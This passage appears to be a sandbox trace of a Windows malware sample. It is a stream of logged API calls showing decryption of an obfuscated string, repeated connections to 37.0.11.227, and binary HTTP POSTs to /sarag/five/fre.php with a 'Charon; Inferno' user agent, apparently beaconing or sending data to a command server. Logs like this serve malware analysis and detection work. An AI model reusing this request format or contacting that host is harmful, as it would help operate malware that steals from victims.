arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0256.451] GetProcessHeap () returned 0x690000 [0256.451] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0256.451] GetProcessHeap () returned 0x690000 [0256.452] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0256.452] send (s=0x758, buf=0x6ad508*, len=242, flags=0) returned 242 [0256.453] send (s=0x758, buf=0x6aba40*, len=159, flags=0) returned 159 [0256.453] GetProcessHeap () returned 0x690000 [0256.453] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0256.453] recv (in: s=0x758, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0256.530] GetProcessHeap () returned 0x690000 [0256.531] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0256.531] GetProcessHeap () returned 0x690000 [0256.531] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0256.532] GetProcessHeap () returned 0x690000 [0256.532] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0256.533] GetProcessHeap () returned 0x690000 [0256.533] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0256.533] closesocket (s=0x758) returned 0 [0256.534] GetProcessHeap () returned 0x690000 [0256.534] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab410 | out: hHeap=0x690000) returned 1 [0256.534] GetProcessHeap () returned 0x690000 [0256.534] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0256.537] GetProcessHeap () returned 0x690000 [0256.537] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0256.537] GetProcessHeap () returned 0x690000 [0256.537] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0256.538] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14f4) returned 0x758 [0256.547] Sleep (dwMilliseconds=0xea60) [0256.558] GetProcessHeap () returned 0x690000 [0256.558] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0256.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.560] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0256.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.568] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0256.576] GetProcessHeap () returned 0x690000 [0256.576] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0256.577] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.582] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0256.583] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.584] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0256.585] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.585] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0256.585] GetProcessHeap () returned 0x690000 [0256.586] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0256.587] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.596] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0256.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.597] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0256.598] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.599] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0256.599] GetProcessHeap () returned 0x690000 [0256.599] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0256.599] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.602] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0256.602] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.604] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0256.605] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.605] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0256.606] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.606] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0256.606] GetProcessHeap () returned 0x690000 [0256.606] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0256.607] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0256.607] GetProcessHeap () returned 0x690000 [0256.607] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0256.607] GetProcessHeap () returned 0x690000 [0256.608] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0256.608] GetProcessHeap () returned 0x690000 [0256.608] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0256.608] GetProcessHeap () returned 0x690000 [0256.608] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0256.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.609] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0256.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.615] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0256.624] GetProcessHeap () returned 0x690000 [0256.624] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0256.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.625] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0256.626] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.627] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0256.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.628] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0256.628] GetProcessHeap () returned 0x690000 [0256.628] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0256.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.629] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0256.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.630] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0256.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.631] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0256.632] GetProcessHeap () returned 0x690000 [0256.632] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0256.632] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.633] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0256.636] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.636] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0256.637] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.637] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0256.638] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.638] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0256.638] GetProcessHeap () returned 0x690000 [0256.638] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0256.639] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0256.639] GetProcessHeap () returned 0x690000 [0256.639] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab340 [0256.639] socket (af=2, type=1, protocol=6) returned 0x75c [0256.639] connect (s=0x75c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0256.663] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0256.663] GetProcessHeap () returned 0x690000 [0256.663] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0256.663] GetProcessHeap () returned 0x690000 [0256.663] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0256.664] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0256.665] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0256.665] GetProcessHeap () returned 0x690000 [0256.665] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0256.665] GetProcessHeap () returned 0x690000 [0256.666] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0256.668] GetProcessHeap () returned 0x690000 [0256.668] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0256.668] GetProcessHeap () returned 0x690000 [0256.668] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0256.669] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0256.670] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0256.670] GetProcessHeap () returned 0x690000 [0256.670] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0256.670] GetProcessHeap () returned 0x690000 [0256.670] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0256.670] send (s=0x75c, buf=0x6ad508*, len=242, flags=0) returned 242 [0256.671] send (s=0x75c, buf=0x6aba40*, len=159, flags=0) returned 159 [0256.671] GetProcessHeap () returned 0x690000 [0256.671] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0256.671] recv (in: s=0x75c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0256.748] GetProcessHeap () returned 0x690000 [0256.748] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0256.748] GetProcessHeap () returned 0x690000 [0256.749] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0256.749] GetProcessHeap () returned 0x690000 [0256.749] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0256.749] GetProcessHeap () returned 0x690000 [0256.749] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0256.750] closesocket (s=0x75c) returned 0 [0256.751] GetProcessHeap () returned 0x690000 [0256.751] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab340 | out: hHeap=0x690000) returned 1 [0256.751] GetProcessHeap () returned 0x690000 [0256.751] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0256.751] GetProcessHeap () returned 0x690000 [0256.751] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0256.751] GetProcessHeap () returned 0x690000 [0256.752] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0256.755] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14f8) returned 0x75c [0256.757] Sleep (dwMilliseconds=0xea60) [0256.758] GetProcessHeap () returned 0x690000 [0256.758] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0256.759] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.760] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0256.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.769] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0256.777] GetProcessHeap () returned 0x690000 [0256.777] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0256.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.778] CryptImportKey (in: hProv=0x6af100, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0256.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.780] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0256.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.780] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0256.780] GetProcessHeap () returned 0x690000 [0256.781] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0256.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.782] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0256.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.783] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0256.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.783] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0256.783] GetProcessHeap () returned 0x690000 [0256.783] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0256.784] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.784] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0256.785] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.785] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0256.786] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.787] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0256.789] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.789] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0256.789] GetProcessHeap () returned 0x690000 [0256.789] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0256.789] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0256.790] GetProcessHeap () returned 0x690000 [0256.793] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0256.793] GetProcessHeap () returned 0x690000 [0256.793] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0256.793] GetProcessHeap () returned 0x690000 [0256.794] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0256.794] GetProcessHeap () returned 0x690000 [0256.794] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0256.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.795] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0256.803] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.803] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0256.812] GetProcessHeap () returned 0x690000 [0256.812] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0256.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.813] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0256.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.814] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0256.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.815] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0256.815] GetProcessHeap () returned 0x690000 [0256.816] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0256.817] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.817] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0256.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.818] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0256.819] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.819] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0256.819] GetProcessHeap () returned 0x690000 [0256.819] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0256.827] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.827] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0256.828] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.828] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0256.829] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.829] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0256.830] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.830] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0256.830] GetProcessHeap () returned 0x690000 [0256.830] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0256.830] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0256.830] GetProcessHeap () returned 0x690000 [0256.830] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4e0 [0256.830] socket (af=2, type=1, protocol=6) returned 0x760 [0256.894] connect (s=0x760, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0256.917] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0256.917] GetProcessHeap () returned 0x690000 [0256.917] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0256.917] GetProcessHeap () returned 0x690000 [0256.917] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0256.919] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0256.920] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0256.920] GetProcessHeap () returned 0x690000 [0256.920] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0256.920] GetProcessHeap () returned 0x690000 [0256.920] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0256.920] GetProcessHeap () returned 0x690000 [0256.920] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0256.920] GetProcessHeap () returned 0x690000 [0256.920] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0256.921] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0256.922] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0256.923] GetProcessHeap () returned 0x690000 [0256.923] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0256.923] GetProcessHeap () returned 0x690000 [0256.923] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0256.923] send (s=0x760, buf=0x6ad508*, len=242, flags=0) returned 242 [0256.924] send (s=0x760, buf=0x6aba40*, len=159, flags=0) returned 159 [0256.924] GetProcessHeap () returned 0x690000 [0256.924] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0256.924] recv (in: s=0x760, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0257.024] GetProcessHeap () returned 0x690000 [0257.024] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0257.024] GetProcessHeap () returned 0x690000 [0257.025] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0257.025] 